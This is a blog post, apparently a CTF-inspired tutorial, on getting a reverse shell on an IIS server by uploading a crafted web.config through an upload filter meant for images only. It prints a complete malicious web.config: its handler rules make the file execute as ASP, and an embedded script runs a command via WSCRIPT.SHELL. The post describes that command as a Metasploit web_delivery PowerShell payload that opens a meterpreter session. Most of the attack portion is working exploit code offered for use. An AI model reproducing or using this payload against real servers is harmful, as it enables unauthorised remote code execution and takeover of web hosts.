RCE on IIS webserver via web.config

Hi,

recently i have started doing CTF’s and their i have learned a lot of new stuffs and this is one of them which is quiet easy but tricky. 😉

SCENARIO :- 

You got an uploader on an IIS server which accepts files only with extension ‘.png‘ , ‘.jpg‘ .

If you try uploading files

  • with extension .png‘ , ‘.jpg  it will be uploaded.

  • with extension .aspx‘ , ‘.asp  it will show an error like this as they are not allowed to upload.

  • but if you try to upload a ‘web.config‘ it will get uploaded 😉 

so you guys will ask what this ‘web.config‘ is all about ?

It is a configuration file based on xml which is used to set rules and behavior of specific directories. We can relate it to ‘.htaccess’ of Linux based servers which is used to set rules and behavior of specific directories.

Ex (rules and behavior) :-

  1. Enable / disable firewall rules.
  2. Read / write permissions.
  3. Controlling database connection strings.
  4. Setting up error behavior and security measures.

Exploiting this vulnerability :-

So we will try to get a reverse shell by uploading a crafted ‘web.config’ .

[STEP – 1] SETTING UP LISTENER

will use metasploit web_delivery” module for it.

LINK:- https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery

COMMANDS :

as we know that our target system is running IIS (i.e windows) so we generated the powershell payload.

[STEP – 2] UPLOADING WEB.CONFIG TO GET REVERSE SHELL

On step-1 we have got a powershell payload now we have to configure it  into our web.config file. Below you can see a XML code save it as web.config and change its red section PAYLOAD with the powershell payload.

CODE (web.config) :-

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!--
<%
Response.write("-"&"->")
Response.write("Spider Sec")
Server.CreateObject("WSCRIPT.SHELL").exec("cmd.exe /c PAYLOAD ")
Response.write("<!-"&"-")
%>
-->

EX:-

now execute the web.config

Now you will get a meterpreter session 🙂

hope you guys will like it

cheers 🙂

Follow us on twitter : @SpiderSec

Related posts

Leave a Comment

5 × 2 =